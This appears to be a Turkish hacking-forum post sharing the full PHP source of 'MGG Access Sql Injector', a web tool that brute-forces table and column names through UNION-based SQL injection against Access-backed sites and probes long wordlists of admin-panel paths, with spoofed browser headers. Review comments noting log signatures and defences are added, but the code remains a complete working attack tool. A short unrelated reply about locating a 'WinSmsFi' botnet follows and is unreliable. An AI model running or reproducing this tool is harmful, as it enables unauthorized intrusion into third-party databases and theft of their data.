MGG Access Sql Injector

G3nzo

Kod:
<?php

// Loads a helper file that is not part of this listing.
// NOTE(review): tara.php and the tarayiciTipi class are not shown on this
// page, so what they do cannot be verified here; treat the include as
// unreviewed third-party code.
include ( "tara.php" );
$tarayici = new tarayiciTipi();
$tarayici->TarayiciAl();

// When the helper reports the identifier "ff" (presumably Firefox; confirm
// against tara.php), a redirect to google.com is sent. There is no exit after
// header(), so the rest of the script still executes for that request.
if ( $tarayici->tarayiciKimlik == "ff" )
{
header ("Location:http://google.com");
}
else
{
//
}
// Coded by ajans
// www.ajanlar.org
// Thanks: ajanlar.org
// Output buffering is switched on, the execution time limit is removed and
// all PHP error reporting is turned off, so the request loops further down
// can run for as long as they take without PHP aborting or printing notices.
ob_start();
set_time_limit (0);
error_reporting (0);
// Fetch $adres with cURL and return the response body.
//
// $adres  URL to request; callers in this file build it from form input.
// Returns whatever curl_exec() produced, or the result of file_get_contents()
// when curl_exec() returned a falsy value (false on failure, but an empty
// body also takes that path).
//
// For log review: every request sent by this helper carries the same static
// values (User-Agent ending in "Firefox/3.0.4", Referer http://www.google.com,
// "Keep-Alive: 300", an empty "Pragma:" header and a 10 second timeout), so
// the traffic is easy to match in web-server or WAF logs.
function GET($adres) {
		$soket = curl_init();
		// Fixed browser-like header set; $header is created implicitly by the
		// first append.
	 	$header[] = "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
		$header[] = "Cache-Control: max-age=0";
		$header[] = "Connection: keep-alive";
		$header[] = "Keep-Alive: 300";
		$header[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
		$header[] = "Accept-Language: en-us,en;q=0.5";
		$header[] = "Pragma: "; 
	 	curl_setopt($soket, CURLOPT_URL, $adres);
		curl_setopt($soket, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
		curl_setopt($soket, CURLOPT_HTTPHEADER, $header);
		curl_setopt($soket, CURLOPT_REFERER, 'http://www.google.com');
		curl_setopt($soket, CURLOPT_ENCODING, 'gzip,deflate');
		curl_setopt($soket, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($soket, CURLOPT_TIMEOUT, 10);
		// NOTE(review): on a falsy cURL result the same $adres is handed
		// unchanged to file_get_contents(); that second request does not carry
		// the headers configured above, and nothing here restricts $adres to
		// http(s).
		if (!$kodlar = curl_exec($soket)) { 
			$kodlar = file_get_contents($adres);
 		 }
		curl_close($soket);
		return $kodlar; 
}
$mgg=$_GET ["mgg"];
if ($mgg==""){
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>MGG Access Sql Injecter & Control Panel Finder</title>
<style type="text/css">
<!--
body {
	background-color: #9CF;
}
.sayfa {
	font-family: Cambria;
	margin: auto;
	text-align: center;
	font-size: 24px;
	font-weight: bolder;
	color: #006;
}
.link {
	font-family: Cambria;
	font-size: 14px;
	color: #F00;
}
.input {
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
	height: 20px;
	width: 250px;
}
.textarea {
	height: 100px;
	width: 250px;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
}
.submit {
	font-family: Cambria;
	color: #FFF;
	font-weight: bolder;
	background-color: #000;
	width: 100px;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
}
.yazi {
	font-family: "Franklin Gothic Book";
	font-size: medium;
	color: #000;
	font-weight: bolder;
	margin: auto;
	float: none;
	clear: left;
}
a:link {
	color: #F00;
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}
-->
</style></head>

<body>

<div class="sayfa">
  <p>MGG Access Sql Injector</p>
  <p class="link"><a href="?">Table Brute </a> | <a href="?mgg=kolon">Colomn Brute</a> | <a href="?mgg=admin">Admin Brute</a></p></div>
  <table width="200" align="center">
    <tr>
      <td class="yazi">Site</td>
      <td><form id="form2" name="form2" method="post" action="">
        <label>
          <input name="site" type="text" class="input" id="site" />
        </label></td>
    </tr>
    <tr>
      <td class="yazi">Table</td>
      <td>
        <label>
          <textarea name="tablo" cols="45" rows="5" class="textarea" id="tablo">tblclients
tblservers
sb_host_admin
tbl_user
tbladmins
Art
_wfspro_admin
4images_users
a_admin
Konto
Konten
adm
admin
admin_login
admin_user
admin_userinfo
verwalten
verwaltet
administrieren
Verwaltung
Administrator
Administratoren
adminrights
Admins
adminuser
Kunst
article_admin
Artikel
artikel
aut
Autor
Autore
Backend
backend_users
backenduser
BBS
Buch
chat_config
chat_messages
chat_users
Client
Kunden
clubconfig
Firma
config
Kontakt
Kontakte
Inhalt
Kontrolle
cpg_config
cpg132_users
Kunde
customers_basket
dbadmins
Händler
Tagebuch
herunterladen
Dragon_users
e107.e107_user
e107_user
forum.ibf_members
fusion_user_groups
fusion_users
Gruppe
Gruppen
ibf_admin_sessions
ibf_conf_settings
ibf_members
ibf_members_converge
ibf_sessions
icq
Bilder
Index
info
ipb.ibf_members
ipb_sessions
joomla_users
jos_blastchatc_users
jos_comprofiler_members
jos_contact_details
jos_joomblog_users
jos_messages_cfg
jos_moschat_users
jos_users
knews_lostpass
Mitgliederbereich
kpro_adminlogs
kpro_user
Links
Anmeldung
login_admin
login_admins
login_user
login_users
Logins
Protokolle
lost_pass
lost_passwords
lostpass
lostpasswords
m_admin
hauptsächlich
mambo_session
mambo_users
Manager
mb_users
Mitglied
Mitgliederliste
Mitglieder
minibbtable_users
Film
Filme
mybb_users
mysql
mysql.user
Name
Namen
News
news_lostpass
Newsletter
nuke_authors
nuke_bbconfig
nuke_config
nuke_popsettings
nuke_users
obb_profiles
Auftrag
Bestellungen
Parol
Partner
Pässe
Passwort
Passwörter
perdorues
perdoruesit
phorum_session
phorum_user
phorum_users
phpads_clients
phpads_config
phpbb_users
phpBB2.forum_users
phpBB2.phpbb_users
phpmyadmin.pma_table_info
pma_table_info
poll_user
punbb_users
pwd
pwds
reg_user
reg_users
registriert
reguser
regusers
Tagung
Sitzungen
Einstellungen
shop.cards
shop.orders
site_login
site_logins
sitelogin
sitelogins
Standorte
smallnuke_members
smf_members
SS_orders
Statistiken
Superuser
sysadmin
Systemadministratoren
System
sysuser
sysusers
Tisch
Tabellen
tb_admin
tb_administrator
tb_login
tb_member
tb_members
tb_user
tb_username
tb_usernames
tb_users
tbl
tbl_users
tbluser
tbl_clients
tbl_client
tblclients
tblclient
Test
usebb_members
Benutzer
user_admin
user_info
user_list
user_login
user_logins
user_names
UserControl
UserInfo
Benutzerliste
userlogins
Benutzername
Benutzernamen
Userrights
vb_user
vbulletin_session
vbulletin_user
voodoo_members
webadmin
webadmins
Webmaster
Webuser
Webbenutzer
x_admin
xar_roles
xoops_bannerclient
xoops_users
yabb_settings
yabbse_settings
ACT_INFO
ActiveDataFeed
Kategorie
CategoryGroup
ChicksPass
ClickTrack
Land
CountryCodes1
CustomNav
DataFeedPerformance1
DataFeedPerformance2
DataFeedPerformance2_incoming
DataFeedShowtag1
DataFeedShowtag2
DataFeedShowtag2_incoming
dtproperties
Event
Event_backup
Event_Category
EventRedirect
Events_new
Genre
JamPass
MyTicketek
MyTicketekArchive
Passwörter durch Nutzung zählen
PerfPassword
PerfPasswordAllSelected
Promotion
ProxyDataFeedPerformance
ProxyDataFeedShowtag
ProxyPriceInfo
Region
Suchoptionen
Serie
Sheldonshows
StateList
Staaten
UnterkKlasse
Anhand des Sachgebietes
Umfrage
SurveyAnswer
SurveyAnswerOpen
SurveyQuestion
SurveyRespondent
sysconstraints
syssegments
tblRestrictedPasswords
tblRestrictedShows
Ticket-System ACC-Nummern
TIMEDIFF
Titel
ToPacmail1
ToPacmail2
Total Members
UserPreferences
uvw_Category
uvw_Pref
uvw_Preferences
Veranstaltungsort
Veranstaltungsorte
VenuesNew
X_3945
Stein Liste
tblArtistCategory
tblArtists
tblConfigs
tblLayouts
tblLogBookAuthor
tblLogBookEntry
tblLogBookImages
tblLogBookImport
tblLogBookUser
tblMails
tblNewCategory
tblNews
tblOrders
tblStoneCategory
tblStones
tblUser
tblWishList
Ansicht1
viewLogBookEntry
viewStoneArtist
vwListAllAvailable
CC_info
CC_username
cms_user
cms_users
cms_admin
cms_admins
sort
account
accounts
administer
administrable
administrate
administration
administrator
administrators
admins
art
articles
author
autore
backend
bbs
book
client
clients
company
contact
contacts
content
control
customer
customers
dealer
dealers
diary
download
group
groups
images
index
korisnici
links
login
logins
logon
logs
main
manage
manager
member
memberlist
members
mitglieder
movie
movies
name
names
news
newsletter
order
orders
parol
partner
partners
passes
password
passwords
registered
session
sessions
settings
sites
statistics
superuser
sysadmins
system
table
tables
test
user
usercontrol
userinfo
userlist
username
usernames
userrights
users
webmaster
webmasters
webuser
webusers
Category
Country
Passwords by usage count
SearchOptions
Series
States
SubCategory
Subjects
Survey
Ticket System Acc Numbers
TimeDiff
Titles
Venue
venues
stone list
VIEW1
utilisateur
trier
compte
comptes
administrer
administrables
administrateur
administrateurs
auteur
livre
entreprise
Contact
contenu
controle
concessionnaire
concessionnaires
journal
telecharger
groupe
groupes
liens
connexion
principal
gestionnaire
membre
membres
film
films
nom
noms
ordre
commandes
partenaire
partenaires
passe
asse
personnes handicapes
enregistrs
paramtres
SITELOGIN
statistiques
super
systime
tester
utilisateurs
WebAdmin
utlisateur
Catogorie
Pays
Sujets
Sondage
Titres
membres
Lieux
pierreliste
Affichage1</textarea></td>
    </tr>
  </table>
    <label>
	<div align="center">
      <input name="basla" type="submit" class="submit" id="basla" value="Table Brute" />
    </label>
  <p class="link">&nbsp;  </p>
    <p>
      <label>
        </div>
      </label>
    </p>
</form>
</body>
</html>';
// Table-name probe, run when the form's "basla" button was submitted.
//
// What the visible code does: it takes the target URL ("site") and the
// newline-separated candidate list ("tablo") from the POST body and, for each
// candidate, requests  <site> + "+union+select+0+from+" + <candidate>
// through GET(). A response containing "The number of columns"
// (case-insensitive) is reported as a found table.
// NOTE(review): that phrase looks like the start of the Access/Jet error for
// a UNION column-count mismatch; confirm against the driver's messages.
//
// Defensive takeaways:
//  - The check works only because the target returns raw database error text
//    to the client. Parameterised queries remove the injection point, and
//    generic error pages remove the signal this loop reads.
//  - In access logs this shows up as a burst of requests to one URL whose
//    query string ends in "union+select+0+from+<name>" with <name> changing
//    on every request, all carrying the static headers set in GET().
//  - Both form fields are used as received: there is no validation of the
//    target, and $url is echoed into the page without HTML escaping.
if (isset ($_POST ["basla"])){
$site=$_POST ['site'];
$ekle="+union+select+0+from+";
$tablo=$_POST ['tablo'];
// Splits on CRLF only; a list submitted with bare "\n" line endings stays a
// single element.
$parca=explode ("\r\n",$tablo);
	foreach ($parca as $tabloson){
	$url=$site.$ekle.$tabloson;
	$ac=GET ($url);
	// Match branch: the error text was present in the response.
	if (eregi ("The number of columns",$ac)){
	echo "<b>Found Table=> </b>".$url."<br>";
	ob_flush ();
	flush ();
	}
	else
	{
	// No match: the attempted URL is still printed, just without the label.
	echo $url."<br>";
    ob_flush ();
	flush ();
	}
	
	}	
}
}
if ($mgg=="kolon"){
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>MGG Access Sql Injecter & Control Panel Finder</title>
<style type="text/css">
<!--
body {
	background-color: #9CF;
}
.sayfa {
	font-family: Cambria;
	margin: auto;
	text-align: center;
	font-size: 24px;
	font-weight: bolder;
	color: #006;
}
.link {
	font-family: Cambria;
	font-size: 14px;
	color: #F00;
}
.input {
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
	height: 20px;
	width: 250px;
}
.textarea {
	height: 100px;
	width: 250px;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
}
.submit {
	font-family: Cambria;
	color: #FFF;
	font-weight: bolder;
	background-color: #000;
	width: 100px;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
	text-align: center;
	margin: auto;
	clip: rect(auto,auto,auto,auto);
}
.yazi {
	font-family: "Franklin Gothic Book";
	font-size: medium;
	color: #000;
	font-weight: bolder;
	margin: auto;
	float: none;
	clear: left;
}
a:link {
	color: #F00;
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}
-->
</style></head>

<body>

<div class="sayfa">
  <p>MGG Access Sql Injector</p>
  <p class="link"><a href="?">Table Brute </a> | <a href="?mgg=kolon">Colomn Brute</a> | <a href="?mgg=admin">Admin Brute</a></p></div>
<table width="200" align="center">
  <tr>
    <td class="yazi">Target</td>
    <td><form id="form1" name="form1" method="post" action="">
      <label>
        <input name="kolonbu" type="text" class="input" id="kolonbu" />
      </label>
    </td>
  </tr>
  <tr>
    <td class="yazi">Table</td>
    <td>
      <label>
        <input name="tablosay" type="text" class="input" id="tablosay" />
      </label>
    </td>
  </tr>
  <tr align="center">
    <td colspan="2">
      <label>
        <input name="basla" type="submit" class="submit" id="basla" value="Brute Colomn" />
      </label>
    </form></td>
  </tr>
</table>
<p>&nbsp;</p>
<p>&nbsp;</p>
</body>
</html>';
// Column-count probe, run when the form's "basla" button was submitted.
//
// What the visible code does: it grows a comma-separated list "0", "0,1",
// ... up to "0,...,20" (21 requests) and, on each step, requests
//   <kolonbu> + "+union+select+" + <list> + "+from+" + <tablosay>
// through GET(). A step is reported as found when the response does NOT
// contain "The number of columns" (case-insensitive).
//
// Defensive takeaways:
//  - Like the table probe, this depends on the target returning raw database
//    errors to the client; parameterised queries and generic error pages
//    remove both the injection point and the signal.
//  - In access logs this appears as consecutive requests whose
//    "union+select+" list gains one number per request, with the static
//    headers set in GET().
//  - The test is a negative one: any response without the phrase, including
//    a failed fetch or an unrelated error page, is printed as a hit, so the
//    tool's output is not evidence on its own that a query succeeded.
if (isset ($_POST ["basla"])){
$kolon=$_POST ["kolonbu"];
for($i=0;$i<=20;$i++){
// $kolonsay is never initialised before the first append; the resulting
// notice is hidden by error_reporting(0) at the top of the file.
if($i==0){
$kolonsay.=$i;
}else{
$kolonsay.=",".$i;
}
// Re-read from the POST body on every iteration although it does not change.
$tablosay=$_POST ["tablosay"];
$sayfaac=$kolon."+union+select+".$kolonsay."+from+".$tablosay."";
$ie=GET ($sayfaac);
if (!eregi ("The number of columns",$ie))
{
// $sayfaac is built from form input and echoed without HTML escaping.
echo "<b>Found Colomn=> </b> ".$sayfaac."<br>";
	ob_flush ();
	flush ();
}


}
}

}
//admin panel brute
if ($mgg=="admin"){
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>MGG Access Sql Injecter & Control Panel Finder</title>
<style type="text/css">
<!--
body {
	background-color: #9CF;
}
.sayfa {
	font-family: Cambria;
	margin: auto;
	text-align: center;
	font-size: 24px;
	font-weight: bolder;
	color: #006;
}
.link {
	font-family: Cambria;
	font-size: 14px;
	color: #F00;
}
.input {
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
	height: 20px;
	width: 250px;
}
.textarea {
	height: 100px;
	width: 250px;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
}
.submit {
	font-family: Cambria;
	color: #FFF;
	font-weight: bolder;
	background-color: #000;
	width: 100px;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
}
.yazi {
	font-family: "Franklin Gothic Book";
	font-size: medium;
	color: #000;
	font-weight: bolder;
	margin: auto;
	float: none;
	clear: left;
}
a:link {
	color: #F00;
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}
-->
</style></head>

<body>

<div class="sayfa">
  <p>MGG Access Sql Injector</p>
  <p class="link"><a href="?">Table Brute </a> | <a href="?mgg=kolon">Colomn Brute</a> | <a href="?mgg=admin">Admin Brute</a></p></div>
  <table width="200" align="center">
    <tr>
      <td class="yazi">Target</td>
      <td><form id="form2" name="form2" method="post" action="">
        <label>
          <input name="abul" type="text" class="input" id="abul" />
        </label></td>
    </tr>
    <tr>
      <td class="yazi">Paths</td>
      <td>
        <label>
          <textarea name="path" cols="45" rows="5" class="textarea" id="path">admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
adm/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/</textarea></td>
    </tr>
  </table>
    <label>
	<div align="center">
      <input name="basla" type="submit" class="submit" id="basla" value="Find Admin" />
    </label>
  <p class="link">&nbsp;  </p>
    <p>
      <label>
        </div>
      </label>
    </p>
</form>
</body>
</html>';
// Admin-path probe, run when the form's "basla" button was submitted.
//
// What the visible code does: it joins the target ("abul") with each entry of
// the newline-separated path list ("path") and passes the result to status(),
// which prints the URL when the final HTTP status code is 200.
//
// Defensive takeaways:
//  - In access logs this appears as one request per wordlist entry against
//    the same host in quick succession. Unlike GET() earlier in this file,
//    status() sets no User-Agent or Referer option on its requests.
//  - Redirects are followed, so a path that redirects to a page answering 200
//    (a login page, or a custom not-found page served with 200) is printed as
//    found; the output is not proof that an admin panel exists at that path.
//  - Keeping management interfaces behind authentication and network
//    restrictions, and alerting on runs of requests for well-known admin
//    paths, addresses what this loop looks for.
if (isset ($_POST ["basla"])){
// Declared inside the if-block, so the function only exists on a form
// submission. It returns nothing; its only output is the echo below.
Function status ($baglan){
// The URL to print is read from the global set by the caller's loop, not
// from the $baglan parameter (the caller passes the same value).
global $girsay;
$ch = curl_init(); // thanks, php.net :)
if (!$ch) {
    die("Couldn't initialize a cURL handle");
}
// Response headers are included in the returned data, redirects are
// followed, and each request may take up to 30 seconds.
$ret = curl_setopt($ch, CURLOPT_URL,$baglan);
$ret = curl_setopt($ch, CURLOPT_HEADER,         1);
$ret = curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$ret = curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$ret = curl_setopt($ch, CURLOPT_TIMEOUT,        30);
$ret = curl_exec($ch);
// An empty result ends the whole script with the cURL error text, so the
// first failed request stops the run. The curl_close() after die() is
// unreachable.
if (empty($ret)) {
    die(curl_error($ch));
    curl_close($ch); 
} else {
    $info = curl_getinfo($ch);
    curl_close($ch);
}
// Loose comparison of the numeric status code with the string "200".
if($info['http_code']=="200")
{
// $girsay is built from form input and echoed without HTML escaping.
echo "<b>Found Control Panel=> </b> ".$girsay."<br>";
	ob_flush ();
	flush ();
}

}
$hedefs=$_POST ["abul"];
$yol=$_POST ["path"];
// Splits on CRLF only; a list submitted with bare "\n" line endings stays a
// single element.
$bol=explode ("\r\n",$yol);
foreach ($bol as $sonis){
$girsay=$hedefs.$sonis;
// status() has no return statement, so $statal is always null.
$statal=status ($girsay);





}




}
}



?>
 

zzzzzmman

Genellikle, hatta %99 ihtimalle, botnet ismi WinSmsFi'dir.

Sağ taraftan WinSmsFi'yi buluyoruz; eğer yoksa en aşağıdaki muhtemelen botnettir.
 